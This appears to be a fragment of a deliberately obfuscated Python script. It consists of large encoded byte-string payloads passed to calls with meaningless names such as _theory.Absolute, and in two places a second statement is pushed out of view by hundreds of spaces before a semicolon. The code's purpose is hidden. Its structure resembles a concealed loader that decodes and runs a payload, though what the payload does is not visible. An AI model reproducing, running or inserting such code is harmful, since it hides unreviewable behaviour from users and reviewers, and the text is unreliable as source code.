#8\xa2|\xce\xf95\xc5\xff\x87\xa1\x03\xf7\x08\xf2*\xa8\xb6\xbad\xb2\x86\xb8)C\x9c\x0b\\#\xab\x82c\xe6\xae\xcdj\xe9a\xfd\xa2\xaf%ZOL8\x0c\x1d\xc9<\xfdJi[\xef1\x1f\xb18\xf0\xfcw\xb5,\xaf\xe1lm\xaa\xbbC\x04_\x1b\x03\xd18\xc9\x0c\x8d\xc0$OCX\x84\xe9\xd246\x93,\xc1(\r\xcc4\x05\x1d\x18\x12=\r\x92\x16\xdez\xc5\x0c\xe5pe\xb8\x97=\xcb\x04\xa4\xf0B\xca\xb5\xfaI5\xcb0?y+M\xeav\x0b\nr0\xf7\x83cu\x8b/c\xfep\x07/\xdc\xf9b\xdc\x82\xaf?\xbe*4TW>ct\xc8l\xb1\xbfV\xe7W\xf4I\xb5?j$[\xe4\xf5YS\xd3\x9bm\xaa\xdb\xc4?u\x7f\x08V?\x97I\xe6\xf9:8\x0f\x87\x8e\xe2\x14;C,\xcf\xd5\xcb\xaa\xeauU\x96\xca\xef\xe1\x1f\xab\x9e\xff\xcbK\xb3\xdd"\x03\xd81\xb2\xa0!\xbf6p_\x98\x1b`~\xa0\x01\x8a\xf0\x0e\x96yU\xc1E\x1c<\x959\xc5\\\xbcZz\xe0\xd9>d$\xa3D0\xa61\xb3\xf3l\xbfR\xfa\x02]9\x0e\xe4\xcd\x90y3Y\x81\xa5\xa4\x9at\xcf\x93aS\xbd\xa6\xde\x93{\x0e$\x7f(\x95\x98\xb6~\x89\xa2\xdfvA)F\t\xa0\xffE\xe7\x07\xd3k\n;a\xd2B\x1ag/[D ,8\xf3"{g\x1ft,\xc5\x1c\xd6\x93^\x0b\xa6\n\xa7\x1ef\xcey\xa5\xf4\x9fC\\\xb7\xb13TN\x0e\x13W\x0b\x10\xcb\x9f\x8cd)\x80\x96X\xfe\xfcqP\xba\x12]\x8b\xc4\x90s\xd2g\xc0\x15\x18\xa6f+\xa5\xcdT\xbc\t\x1f\x18\\\xcb+\x0c\xf9uJ\xae\xcdJi3\x8a\x978\xca&\xc1\x18)\x9f,\\-mJ\xb4s\x07n"\x8e%\xa9#\xda\xb5\xd2_H>\x0f\x83\xb8A\xe2\xff\xfe\x1d\x0e+(\x00\xe0\xea\x92\xae\xd5,\xa8m\x87\xce\x16\xb1\x9fT\xcc\x13%^d\xccoa\xa5\xf4\xc0W\xcd\xb83G\xfc\xaeC\'(\xc7\xab\xa5\xbf\xc8=\x7f\xfb\xd4\xf9\xac\xda\xca\xfd\x00b\xab\x19\r\'\xfeV\x176\x05\xc0kgIH\xf3\xbcIS3MB\x9a\xebD\xd56\x15\x07\xa6tbs\x1b\xa6#c\xd2a\x9c\xe3\x93\x1a\xf8I\'\x00=\xcf\xd9\x83\x14xMS3J3b\xaf\xe1\x8c\x15\xd2L\x1d\xd1\xdc\x8c8\xa6\x89I\x93\x90\x86Ub\x86Il,m\xdbt\x1c\xe7\x9c\xe9\x0c\xebC\x13\x9bQ\x92\x98\x18\xba8\xe28\xd2\x98\x8e5\xd6\x86\xc6Ft,\x9d\x7fj\xc2$\xb3t]\xaa5\xa2\xab\x84\xc6\x98\x90>\xc4\x8b\xd8\x1cJM\xaa\x81\xd9\x1a~\xacI\x92\x89\xa3\x10\xd5\xc39\x11G\x94\x00\x8f\xcad\x06O\x95\xe2\xae\xa0\xeb#\xd99O2\xac\'IJ\x924\xa6\x18z\xceD\x12\xe1\xc4\x99\xcd\x0c\x9d\x91\xee\x99\x96iH\xdbC\x12\xbbG\xa9\xa1\xf6\x08\xe9\xccP&\x1a\x06\xd5\x85\xaa0\xc2\xd9\xe9\x1b\xd1\xde\x84\xee8E\x06\x07:\x0e{B\xb9\x86\x99!\xa6\x13\x04&\xe5\xb54\xa46gm#\xed\xa7\x16@\xc8\x13\xd4\xb4\x16*\xc7\x8c\xbeD\x88,\x9c\xef\xad\x99q6\xdf,\xa5\xd6A\x9aAj\x03\xbac\x8b\x161t^K\xa59\x97\xa0}fh\xc6$\xc6\xfd\xb3Z\xd4\xe0Dt\r\xe7\xc9n\xa1\x1e\x1d\x9bQ\x0cEo\x8e#\xe0\xf7\x16\xa3\xb5b\x9c\x05\x81\xcat%j\x0bjM\xea\x13|N\x12\x04\xad\x89\xe9\xa9Y\x8dK\xcfi\xe9\xad\xc5xR\x04\x06\xb0\xb2\x97\xee\r\xea^z\xd0\x98\xdex\x1c\xb3\x9a\x19\x8a\xe5\xc0\xe4TB7\x87\xc1C{`&\xcb\xcd\x0c{\xd2\x08O\x85r(PaI\xa2\xbd\x86\xf6\xd3>\xf4:\x92IA\x92\xa9\x05y\x7f\x84\xeb\xc4\xe8Qp\x93\x8b\xa8^L5b\xde\xb2t/\xd4\x93q](b\xe1B\xc6f9\xb8\xa4\xd9\x18\xaa\xa9I\x12Qk\xa70\xdb\xc6!\xfa\x0c\xfdR\x1f03\xbcI\xba\xfd\x19\xf1yT\x1f\xf7C-\x9c\xb0\xfb\x1d\xd4\xce9\xb5o\x90fx\x9e\x04\xa7\xa7w\xc6\xc6>\x92\xba\xd0\xbaP\xecZ(\xcb#\xc4et\xa0\xda\x15\x15n5\xf4\xa1t\x05\xd1-\xd9\xdbE\xde>\t\xf1\x81w$\xba\x1e=\xa1\x81\x96\x1c\xbeq4P\xb2\x8e\x02\x1fV\x95\x04u\x15A7\n\x82C\xce\xffra\xb1i\xba\x95f~\x0e\x877\xbf\x81\x9b\xb4,Tg\xcc\x86*k\x1a0\xf8b\xa5\xf4\xb0\xb7\xc7\xaa\xf3\xd0%s\xd2|\xf1\xd1ji\xb3\x93\tBf\xc0~6`\x8e-\x9fl\xa5\xb4\xcd\x04\xaf\xe8x\xa1\xa7\x1d\xd3x\xcb\xdc}\xfd\xb8\xccmu[\xb0\xaf\xfbF~\xc3\n\x86\xbc,\t\xfb\xe7\xa6\xec\'+\xde\xb1\xf0,\xee`\xc42ve\xee\xc5\xcfj\xd6\xd4\x12\xd5\x92>\x87\x8f\xa1\xdd\x85\x19[+\x943(\x80\xa0>"X\t)\x13\x1a\x81\x91\xff\n$\x9d}zC\'~0\x82]\xadh\xbe\xc6}\xc4\x13FJ:S\xde\xd6c,Z`\xf1\xdf\xdd\x16h\xfc\n\x90~\xd7\x0c"]r\x17D\xac0\xcc\x05\xfb\xe9\xad\x04)\xd7J\xdb\x1a\xa6|x\x1f\x05\x8f\xf0\rN\xb9g\x98\xdaVw\'\xc0\xcf\xbd\xdeN\xc7\xeeW\x1a\x90?.\x03\xf3]Rf\t\xd6\xefB\x0f(>\x05\x96E\x83xH\xac!\xb1\x81\x82\xac\x17\xc3\xe6\x99\x10;\x8d\xf8\x8d\xfd\xbb\xe1\x06w\x12\x07\xe88+\xc1\x1c\x05\xd0\xd1\x94\xb9\x7fM\xe1f\xdf\x95s}G\xa6\x12\x85:\x1e\x16\xc9\xb6\xebI\xb6u*\xe1w\xdd\t\x02\r\xcd\x8a\x88\x15I\xa3\xa9\xc9\x92<\t\xe2a\x85\xbc@\xd8\x03\xa8pD\xdf\xd0A\x0f\xcbz\x8bpwZ\t\x96K|9\xdc\x9d\xb6\x82\xb6i\xbb\xba7\xbbV\x83\t\x1dP\xe4\xd8e0\x04X%\x1c\x8cZ\x18\xff\xfb\x0e\xb9k\xa1P^.\x9e\xf0\x85\xb7\x8a\xef\x12\xdc\x8dKO\xe9\xd4\xa3.\xffZ\xe2\x97\xf3\xbe.\x85!\x0f\x95\xa5\xc8$\xb6?4\xcdB\xdf\xaf\xf3\xf0\xdc\xc19\xe8\xf9"~\xf7TA\xee\xc5\xa1q,]\x10\xb7\xf0\xe5\x10\x83\x86\xb3i\x88\x85C\xb2w\xb5\x15\x85\x14b\xa6\x1eP\xa30\x9f\xb1\'\nm\xab\xdb\x10\xdbn\x9f\xf8[\x84\xfa\xa5]\x85\xea\xb9\xb1\xe7\xeba\xc6n\x0c\xeaG\xb53R\xaf\x8b\xb1\xd8Y\x92\xd7\xa9\x97\xe2uZOL\xd6\x05Q\xc9\x98\xa0\xc0\x85\xb2\x16\x8c\x1eM\xda\x07\xa3/\xa5\x18\xbflw\xc1\xe7\xa0\x1a\x8d\x98-ob\xef\x00\xe2\x83\xa4\xef\xa8\x9559\x91a\xa5\x8b\xe4\xfb\x08\x1dZzR/k3|\xfdty\x8a\xd4\xab\x89\xac\xd4\xc7\xc7G\xf4\xddVw\x07D\xdf6\x06\xb8\x83f\xaaD\x9a\xa2\xfe\xf99\x7f\x19\xcd\xae\x112A\xc06\xb4\xd8%#\x0f\x1d2A\xb8Z\xda\xd4L\x07\xfdT\xcaba\xea@\xf1\xe2\xd5\xd2g\x99\xd6\x14J\xac\xd2\t<\xb7\x0eS\xa3\xe9\xdb\xea\xee\x80W\xda\xa6Sl\xc3\xe0i\xab\x03p\x11X\x12\xd2\xd6\xac\x8b\xc4\xfc\xeeB\x1e\xf4\x18\xf6bO_)m\xea\xb8\x11\xf2\xc70\xfd\x88\x1cUY)}\x16\x7fX_\xa3\xe9k8\xfd\xb2\xd4\xf3\x10\xdaVwG$\xe2=\x83\x9d}\xa7\xb7(0\x86\x97\xe1\xfe\xceo\x0b\t\r\x87\xa7\x0e\xe0\xf0nn$F\xbc\xc9\x1b\x10*\x1e\xb0;D\xceFq\x90\x8ft\xb5\xf4YF\xbc\xc2\xde\'\xde\xe8\xf5\x11\x88#\xefu6\xa9\xdb=\xb0t\xe7!\xd5y\xcd~V\x06M\x0c\x0b\xa9\x8a\x96\xfb\x07U\xb7v3\xd8U\xfa\xd8\x1d\xff\xd7G\x95\xab\xaf\xd5\x11\x81;B\x00N\x18\xdfD\xc2\xefb^\xcf\x19\x85$\xe0<\xf2-\x98\xc0\xabO\xce\xc3\xbb\x88z\x93\x92F\xf1\x04\x81\xe6\xa9a\x83\x98\xe2O\x86\xab\xa5/_\xf7\xdfB\x18:\x06\xfa\x10\x9d\x17\xe7^2\x08\xd1a\xc5snNI\x0b\x14p\xa8rX4r\xa5\xb4\xedD\xa6f8\xcd\xd8\xaa)\xed\x8aro"\xdbV\xb7{\xca\xc7X\x9a\x93$5\xd3h\x8c\xf5x\x04\x0c)V<\xe6\xd1\x18\xf2\x12\xfca\x92\xc8+\xcf\xa4\xdc+!i\x18l3\x9d\x07^ ey*\xe5^I7\xb0\x8d\xc3\x8a\\\xac@\x15\xa5\x87B\x17\x0e\xf0\xab\xb9\x086\x016\xee\xcf\x15\x00\xda\x10\xb6B\xfcq\xde\xe2Vh\xe2~N[E\x8a\xd3<\x8cE\xbc\x97g\xe0\xd9V\xb7C\xf4\x83:(&\xd0\x99\xe0\x0b\x923\x0eh\xc6-=b\xb7\t\x83\xae\xc7H\\\xd3\x94\xf3\x8e;\xcd\xe1T\x92\xf9\x89L\x07\t\x8f\x11\x99f\x8c+:s\x1e&F\x15\x00\x9c\xb7\xa8T\x07LV\x8fb\xd8M\xceW\x14\xb3Q\xd0\xb2\xa4H\x1d\xbb\x05\xcd+\xa1E\x80,\xc2\xeb\x1f>\x1c\x94\xee\x1d\xde\xaf#q\x90\x98\xc69?\x84\xec\x05\x9a\xae\x96\xbe@\x7f\xcc\x8dj\x80\x16~\xb7\x03\xb8\xdb\x06\xd0\xfe,\xd9\xde\xd2\x0eR\xf8\x19S\xac\xa7\x8c\xb3\x96\x02\xeb\xad#\xf0\x06\x1f\xb4aZ\xc09\xe8Z\x17\xfa>\x0cb\x1e\xde\x96\x87n\x17s\x8e\x07u]\r\xb9\xf2\x81\xb0;\xb1\x0e\xe3\x81\x88A6D\x8d\xe8\x97Zq\x1c\x8dSM\x85\x9a3"\x9e\xe2\xe1\xcdlV\xd4\x19q$\xfc\xe6\xba\xb4\xbf6\xfd\xe7\xa9\xd3\x89\x01C\x82\x9b4\xad\x96ZN\xbdj\x83\x95\xbap\xad\x84\x92\x1c\xb4{Xc\x1e\xd6\xddA\xcc\xafl\xca\x98\x85\x13v\x02\x16:\x0f\xaa\x9e\xd09\xd2x\x92\x82o\xf7\xef\xb1\x93\x98\xba*\xaey=\x9a\xce\x0f\x13\xea\xe8%\xaf\x05\x93\xac\xa3\xe4\xe6\x80[\xb4\x98\xa4\xe0\xbc\x0bX\xc6C!\xe4\xaew\x96\xcc*\xc8\xd0u\x9c\xe8\xac\xe2@\xd9\x15j\xf4\x13N\x93\x13\xeeSxpv\x81n\xa3\xa2\xc3=\xb8\xdb\xb9\x8cd\xe3e\xdb\x85;Ifq\\\x04\xc6\xeb\xf7\x93\x944\x12j%\xf9j|m\xaf5\x1c,gs\xc3Ji[y\xcb&eN+\xd5 \xa559k]\x9d\x1d\xe4\xab_\x90F\xee\x87\xc4\x8e\xc9\x17V\xd6C\x86\x8emnT?\xef\x87\xa2H\xab\x80\xea\xe7elR\xb7\xdb\xbc')

        Builtins._floor(MemoryAccess = -95906 * Builtins.Power)                                                                                                                                                                                                                                                          ;_theory.Absolute(Walk='NMNNNMMNNMMNNNNMMNMNM',_while=b'\x8c\x91C]mi\x8a\x05\x0b\'~2n\xcf?\x0f\x0bg\x9c\xab\xadm\x91\x89|\x0b\xa7\xe34\x97j\x8f.\xf5\x99\xea\x1b\xb2\xb7\xfd\xb9\xb1\xe6Rq\x0b\xc5\xd4\x11\x0bV\xf7[\xc5-\xac\x946\xb7\xa6\x80\x18\x85\xaa\x1f/\xac)\x95\xd26\x9d\xc07_\xe9\xba\xe6\x85-\x14\xden$5\xa9\xdb0wW\xf1]+t\x8a\xc4\xc9\x0b\x968!|\xfe\x1aa\xf2\xf9P\xbf\x9e_\xa2L}\x03\xd1\xe1\x19\xd5\xc2e\xc2\x0b\xde\xab\x94\xed?&[7v\xec\xf5du\x0c\xd6^\xad\xce:\x89\xd7\xf3\xb7\xd5m\x8a\xe3\xd8\xa6\r\xd5!\xa5tL\xa98\xabt!\xa8\x1e\xc2\x9d\xefXuG\x8aP\x8b\x95\xb6\x06\xfb(\xa9:t\xfb\x94\x89\x1d\xaf<\x83\xfd\xb6\xba\xdd9a1n|\xc0x\xf1@\x86\xc7o\xc2\xdf\x98\x01W\xbaP5\xe7\x15t\xe4\xd2\xa8\xe7g\x0e\xf2\x96]9\x11\xc3\x84\x15?\x9f\x13\xf1\x85Cd\x01(\x8b\xfc3^[\xb3\x1c\x8d\xbf\x02\xafq\x1fn\xbd\x85\xc0\xa8\xc0\xc4\x0cQ\x8c\x95f\x12R\xcc\x9f\xc4\xa1\x17H4}\xb2Z\xdaL)+\xb96B\x17t\xa7\x1e\x00+\xa5\x8d\xdeX\x91\xee\xd2\x87\xa6\x8bVK\x7f\xd1||\x00sM\x83\x1c[\xec{\x0e\xf3\x01\x9b\x00\x902:L\xc7-L9\x1bx\xec\xaab\xa9\xc4\x9b\xf1\xb5\x8a\x9d(\x9a\xe2Y\x17q$>\xd8m\x99q\xa2\xfe\xdbI\xf4\x08+\x80ZP:\x87\xd4vU`\x02^\x1d\x14\xac\r\x035\x11\xa4\x12\x17\x87j\xdd@])m+\xc2\xfb"\xb9\x02\xad\xa9\t/\xf0\x04\x8f&uw\x14<\xf6\x9a\xd5:r7\x9e\xd4\xb8c\x9f_\xee\x9c\xa7;\x1cj\xfbz\xe21-l,\x13\xcf\xba\xe2\x83d{%]<p|\x10\xe8\xe8\xf5\x0f\xe8eu)\xa1\xceK|c\xfcv\x15\xfa\x99\xb5P\xdfmR\xa9\xf8\xd94J\xa7\x05\xdf\xb5\x7f\xf8\x0c\xce`H.\x98\xb2\xe3Kr\x1d9\xd2\x03\x16$[-m\xeb\x0e\xa8\xfe\x02u\xc2\xa2\xfaB\xe3\xb9\x03n\xab\xbb\x0b1Z\xe7j\x84R|\xb9xI7\xdd\xe6\x01s\xcf)"L\xcaD\x04~t\xac\x0f\x81\xb9\xadn\xcb\x14\xed;\xa9\xd4\x0c\xc30\xe8\x1b\xcf\x9d\x1b\xf0J\xe93\xb3\xef\xeb\xde\xdb\x99\x80ZQ\xd1\x19. \xc9\xea\xa8\xa8\xadK\x8c\x82\x8f\x16)&\xbcm\xdf?\xbdI\xdd\x0e\xc5]\xc8~)\xa7g\xb3.\x11\x99u.\x8c\x86\x03KS\x12\x88[\xa4Q\xbd\xbd\xbd\xd5\xb0\xf4;\xf6N\x97\xe4+\r\x84\x99\r/\xdfk%\x9f\xcb\xd0\x96\x8c\xbd\xb1\xd1\xa4n\xcb\xb1\xb1\xc9\x86\x86d\x7f\xea\xfe\xc3\xc6\x84\x95l\x17H\xd8V\xe4\xbb\xe8,\xf6k\xe2M\xe9U\xc7\x89J\xc6\x0b\xad\xd5E\xe4W\xd4e\x1e:\xcfQ\xaf\x0cs\xd3e\x89$\xef\x9c\xf8^"\x86\xc7z\x8eS\x83\xe35\x13\x83\xc7\xa3\xf8[\x9a\xa3\xae\x93wg,\x8b\xb2\x96\xb3E\x02\x9a7c\xa7\x01\xe9\xd6\xecE\xc1\x99\x0c\x83X\xbat\xc0\x91\x0cZ\'\xa7\xae=Y[o\x8a\x9c\x88\xf1\xc4\x841 \xac"\xe6m\x8dW;\xa2\xb1\xdc!\xce\xb1\x0b\xd7\x1fV\xd0_\x14\xa2!/\xc2\xfb\xbb\x11\x95S\x00 \xc4.Ec\x07\x00\'\x02f\x92z\xfdE\x81MR\xc7\xef\xea\x96$\xff\xe9\xa4\xf7<\xe5WA\xbd\x029$$\xfbhw\xa1\xae\xe5\xa8\xcf\x0b3\xe3\xb8M\xa6\xb9.)\xc0\xf1\x9db\xb8\xb8\xb9R\x94\x7f/\xd9b\xdc)\xdds\xbd\xd7\xb8\xb4Te\x06N\x85\xed1n\x9f\xf4\xee\xfdE\x9b\x94S\xd4\x85\x05\xc2p\xc2v[\xbbZ\xdaVb\xf1=\x9fC\x8f\xedS\xaf\xe8\xc0\x93X6\xd5\xdd!\x17\xe4\x1e\xe84\xc3\x02\xfa*/\xa0\xafJ\xa4\x1a&\x97\x87\x1f>A\xfb\xe1#\xa0\x1be\x02o\x01h80 \x03w\x04\xe3\x90\x81\xb3"\xbdJ\xa5\xec\xa06\xeaCcE\x08\xf6m\xcaQ\xc0\xe2\x90\xa0\x88\xbb+\xa5\xcdN\x16\xb1Dg\xf9\x90\xb0\x00Q^)=\xe0#l6\x11\xab\xc4\xab\xc9 T\xf4\xb7n\xe0\x84\x9e\x89x[\xdd\x96\xb0w\xadt\x97\xecH\rX\x8d\xc0\x85\x92u\xe1\x98:+\x13\xfe)]Mg%m\xd55\xa1\xb3\x1dD\xbc\x80K\x9c\x86\xa3Q\x86\x1c\xd9Y\x14\xd8\x18[\xc3\t\xf1\x08\x01gHgMg\x14\xa4\xf18\x1eR\x19j\xd1Z\x84\xcc\xdc\x1d\x00s)\xe1\x1bz\x90\\\xe3\x82\x03,\xbe\x9dX`;\xc1\xde\xd1\x88\xa5\xbc0!\x97\x86\xe5q\xb1\xa7\x0b\xa4\x0f\x80(#\xb9\xbb\xbc?k\xe8\xad\x8dI\n@fuI\xf2\x91\xd8\xbc\xf2\x8e\xf7\x8f\xf1\x0b\x04\x86\n\xc5\xb8\x93\x01\x87K\x006\xa3\t\xcd\xc9\x18_\xdcpb\x01\xcb)G\x11\x02\x9f\xaf\x96>\xb3]\xf2P@G1\x87.\xb5\x88CA\x83.\x07\x8aB\xc2\xfb\x1b5l\xccf]\xc9\xe3\x1ap\x08\x8f\xb8\xd6\xad\x94\xb6%\xf8J\xacS\x8f\xa0\xfb\xa8\x1f\x81G\xf07\xd5\rw\xe0\xaaZ8\xef\x02\xeeq\x7f\xa7\xca\xe33\xa8)\x11\x19\x84\x0b\xd0e\xce\xb8\xcf7\x04\xe5g$\xfd\x9c\xf1\xed1\xcf\x9b\xb7\x92=\xbaRvP\xee\xc5\xf2ys\x976\x02\xd7\xb2l\x0cX)=\x84K\xa4\x0f\xd7Pq,\xaa\xcd\xfa\xdb\xea\xee\x95_z\xf7\xd1Z"\x08\x8di\x94v \xff\x17\x11\xf0\xd6\x8b\x82\xaf\xc6\xc5\xd3\xef\x8b\xe4\xe5\xd5\xfd\xec\x83\xf3&m\xe5|\xa6\xa0\xc6\xaa\x0b\xb6I\xe9\x04\xa8\xc80>\x02\xe9\xb6\xba\r\x11H\xf7\xe3\xfa\x00u\xdc\x81\xcf\xb5\x17=\xa3\xd15\xb6\xb2]D\xd8t\xa1?\x0c\x92Q+T8\x07\x03\xe7b\x16\xdcj[\x7f\xc4\xcc\x1b\xf2>\xe0[\x9eT}\x117\xd5\xeb\xce0S\x05\xab\x14\x90`\xda\xae\x81\x8dQIk\xb01\x15\x94\x17\x8ag\xf8\x925Np\x86\xe0h\xb4L\xd2)\x11\x03\xd9\xc2:%(k\xcc2\x0e\x00j\xdal\x1a\x8d\x18\xd6!fH#\xeb\xbc\xfc\xe3z\xd9!\xc4X\xd5\xfb\xa8\xd7r\xea\x89\xab\xb6&\xc6n\xaa\xdbm.\xcf\xa8\x03\xed|=\xd5\xb9$7W\xef/?\xe9y\x17\xb2\x98\x97|\x9a\x13/#\xbf\t2\x86D6G\xcascc\xa4)Y\x97\x82\x9a&s\xd4O\r\x12\x92 +\n\'\xad\xae%\xa2\xc6y\xe8\xbc!\x12/\x9b!\x92R4OImF\x92Q\x84\x93J\xdb\x18\xe7\xc9b\x13s\xe6\x12\xa8\xd9\xe9\x0c\x89\x99\x18\xe4xA\ni\xa4\xce\x86[s\xc4\x89\xa2\xd9\x9e\x9b\x8eh\x8a\xc9\\\xb3"\'\x0c\x15\x03b\x9f\xef\x8a\x8a\xe9\x1f\x16I\x9b\x8e\x91I\x05\xb9\\\x90L\x9a\xeep\xc4\xfba\x0eB"\x8d\x1c\xc9\xa6\xd3\x11\xa7\xb8FV\x1aN,\xcd\t\xba\x13:\x1a\x99Ob\x9b\xe3L~b\xea4\xa4[%\xca\n71\x9c\xc3\x02\x9f\x99\xda\xd9&.\xb15\x9eq\x8c\x1c.\t\xda7\x97\xe4\xdbil*\xc9\xa9m\x88\xc0a\xb9\xdbu\t\xaa\xa9\xee\xfeI\xaa%\xa2\x85\x03Z\x84\x03q\x9f\xb6:`\x1d\x97iR\x86\x0e\xea\x97\xe1\xe8<\x1d\xf0\xb6\xba\x07q\xeaxV\x87\xdbu2&\xe4ulbE\xd2\x8d-\x1b\xca\xef\x87\x06\xad8\xa8\x10\x7f\x90\xb9\xff\xe0@\xd5\x9b\x98D\xbb\x12\x82\xed\'\xb8]a\x1c\xbbp\x92\x1b\x9a\tpYL\x98\x8e\xe2\x94\xa8Y\x92D \xa86\x88\x11\xccO\x14\x84\xa8Qj\xb2\xc4$-f~\xc1I\xd4\xdc\t\x05zb;\xbf\x94\x8ec\xb2w\xea\x81\xfb\xb8|\xaez\x88L+^"]\xf8\xb6n\xf5\x14\xa0y\xd0y\n4\xf5A(\x8f\x10\xdf\x82\x11M\x1d\x93\'}\x0br\x92\xfbZ\xc4\xf7~r\x99\xb7\x9dS\xf7U\xb3(v8H&\x0c\x9a\x1a\xb3\xeeC\x12\x9cf\xab\xa5/?\xbe\xa5\xe6\xcd\xb4wC"+3G\x00\x9d\xf7/\xf8\x97s6\xf7\xcf\xdb\xb4\x80N\x9e\x9a\xce\xc8\x9fL\xd5\xa8\xaaR\x7f\x93\xba\xddI\xfd\xac\x16l\x0bH\xbfidO*n\xdb\x93\xfa\xd8\xee\x82\x85\x1e\xef\xdf\x19\xbc\x8b\xc8E\xf9\xda\xcf2\xc5\xc7\xde\xbb\x8f\x92\xd2KPU\xc4qM\xf0\xdaV\xb7K\xc1\xab\xc0OSw\xc6:V\x82\xf5\xdc\x837\xd5k\x02X\xb16\xef\xd4\x1cXr\x00\x93CR\xe8\xf68r\xea\xdd\x90x\xf7\xec;\xc4\x06\x9e\x9anS]\x96\x82\xbb\x1b\xb0Q\x9a0\x17\x96\x1b\xf81\x19Ftk\x91\xd3\x99\xa8\xdeE\xff\x82\xa3 \x81\xf1\xddoB\xf8\x04n `\x9d=\xbb\\\xbf\x15\xa8\x01\xaf\xe4\xe5\xcf\x1fB\xf3l*\xac-\xe3\x0bM\x04a\x06J-D\xd6\xb5\xd1\xed\xb0b\x07\xe5\x9c\xaaF\xd1\xd4\x9a4\xadN\xc2b\xfa\xcb\x9c?P\xad\xec\x9f\xa0y\x9f7\xe3e\xa1\xa5Q]\x8d\xff[\xc6\xee\xed\xef\xa8\x95\xb9\x1c\x8f\t\xfb\xa9 \xea-v\xd6\xa4Zi\x9bW\xa3\xd6\xa1\xcc#)\x054\xa5#/\xa6\x06\x1c\xbe\xa9n\xd3\xd0\x925\xdd\x18\x00\xde\x0c\xdb=\x07T\'\xad\xb5}6\x9d\xa3\x02o\xa9<\x8eL\x07U\x18\x9eMu\x1bB(<3\xe8\xaf\\\xe0\xd2\xfd1\x17!\xd7n\x85\xb8\xd5\xb9/e\x87\xd2\x9d\x8f\x81]\xd8\x02W\xad\x82\xde_\x17\xce\xceC\x9a1\x874_\xb6\x83\x10\xdb@\x7f|\xbd\xb0~\xab%%m\xeaBsq`\xb6`Q&\x13\xe35\xb6\xcf\xbc\xe4.\x0cQ\xa6\xcd\xb0\x8d\xa2b\xc0^\xca\xa8m2Y\'\xces\xc12\xdf\x03\x7f\x1d\xf8\x18\xa4\xab\xa5\x870\x18\xaa\xb9E)\xa2B)YoVhRw\x87\x80\xc3\x16\x81\xa6i\x1b\xdb\xd8\x80\xd5\xb1\x01\x83\x98\xa1\xb8\x91\x93\xc9\xaf\xd3\x8e\x1d\xd62\xe8\x12\xba\xe9\xa8\xeb\xb7\xb3\x8a\xaa!N1\xd8m\xadw$\x9eh\xb3\xad\xae\xe9T\xb4Im\x12\xd0%\x86&4\xd38b\xd0\xd4,\x8d\xd2\x88h\xdb\xc4\x8c\r\xec*#\xdaK\x1d\xdc\x8c\x11{\x9e\xc6\xac\x0c\x86\xc5\x8aZ>&\xe6\x12\x99\xe6\x8dM23J\xa8\xff\xd11\xb1\r\xe9\x13\xc5\xb9\rMb\x87\xb4\x0f\xd0\xd7t\x85$\xa3\xfd1R\x92\x9a\x08W1\x19I\x01\x91\xb1\xd4\x04)]\x85$\x00\xba\x8ah\x82S\x9b\xc7yl\xa8\xce0')

        _theory(Substract = -39384 + 9578)._floor(MemoryAccess = -7669 / Builtins.Power)                                                                                                                                                                                                                                                          ;_theory.Absolute(Walk='S2SS2S2SS222S2S2SSS2S',_while=b'\xb6\xb0\xfa\xd0%S\xb6\x06\r\xcd\x08\x89M\r\xc2\xe7R\x98\xe5,\x0fA\xa2\xbf9\xcfm9I\x11!lJ\xb8AX\x92\x88\x11\xa6c\x92\x14G\xc5\x11=\x89\xc4\xe0 \x98~DO\x9e\xd8\xc0\x18\xb6\x99\xc56\x8bC:;\xee60\xb0PEbO\x03\xc01\xddG@-\xe0,ZH\xf7\x90&\xc6:[\xda\xc8\xc0\xf0\x97\xd3\x16U\xa7\xe3\xd9\xa6\x07\xeb\x16lT\xecg\x9b\xd2\xab\xb5\xec_\x0bt\xa1\x84^l\xc0\xdbi\n\x8bc@/{\x18\xe3\x9e\x87\x80`Mq\xf6\x08\x97\xa6\x8e`\xa8vH\xf7AsZ\x1bt\xe9\x02\x93B3Kp\x92\x89_\xe3\xb9n9\xce\x02\x84:\x17%(3\xf5\xb5\xb2\xb6\xc3OmfA\xe2\x05~*\x1b[\x1b~\x9b\xea\xc6\xcd\x87_K+\x10\xf5\xc5\xcc\xd0}\xb0\x07rb\xa6I\x0b<\xaf2/t\x89*\xc4&\x8f\x97j9\xdb\x1b\xb5\xd3V\xe1\x8cg\x9c\xca\x19!v\x0ce\x85\xc9A\xa3P\xb9}\xf3\x04C*7S\xb3\xe5x\xcb\xe8\xfc\xb4/\xd60]>n\xc2\xef\x07\xc7\'\xee\xf8\xd8\xd9\xeb@\x8d\x88\xb0\xe0l6\x10\x0f\x1e\x00+\xe3X\x0e\x0b&"\xc6\xd8\xd4\x99\x94Ir\x0b\xfd\xf0\x99JY]\xf7\xe7\xfa\xe1\xfdey\xe0>!\x97\xe7Rn\'\xee~FD\n\x83\xf2^$\xb95\x82\x8f\xe9N\x0c\xb2?\xd3\x13\x01\xef4L]>\x04\x17\x90\xd8Q\xacn\xe1Q\x9fW\xfc\xea\xcbp\xa3\x06\xee\xe8\x8b\xe1\xedh2|\xd5\x17\xa7%q\\*\\\x98\xfa\xbd\xa7nhm.\x0cH\xd7\x92$\x8bsd5\n\x18\x92$X\xc6Yl\x14\x898_-m\xeb.\xe0s\x03\xbe\xabO\x11\x1e\xe6\xb9\x0bl\xab\xdbm\xe6\xf4\x83\xc4\xb2\x1e3\x8d*\xd1\x02\x9a\xe2\x9e\xe5\xac\x94\xc3\x84\x818&V\xd5Q\xed\xe0:\xaa\x976;Y\xc2\xa9\x11-\x87\x00\x00\x98,\xe1\x93\xa5\xf5\xd2\x7f\x0eo\x82b\x8c\xb7\x14D\xfd\xf0\xba\x97\x90\xd3Z\x82\xcfD\xbe\x03\x0b\x81\xf8;\xcb\x1e\xed+\xa5\xcd\xe2\x15b\x8e\xf34\xfc\xcb\xf9\xb1\xde"^a\xa5\xb4\xcd\xa3+H\xb8\xba\x15\xa7\xdeW=\xf7\xd4n\xd3\xa4\xee\x0e\x06\xa6\xf5/w~3\xbfq\xff\xd03"W\xe0\x0bx\xbd\xeb{td"\x8e \n\xd3)\xfc\x00\xc6\xf1(\xa6\xe5\xc4&\x88\x1d\xcb\xb9\x14l<\x95!\xbf\x04\x83\xb7\xd1d\x17T"\x92\x88\xf9\x8f\x90\xca 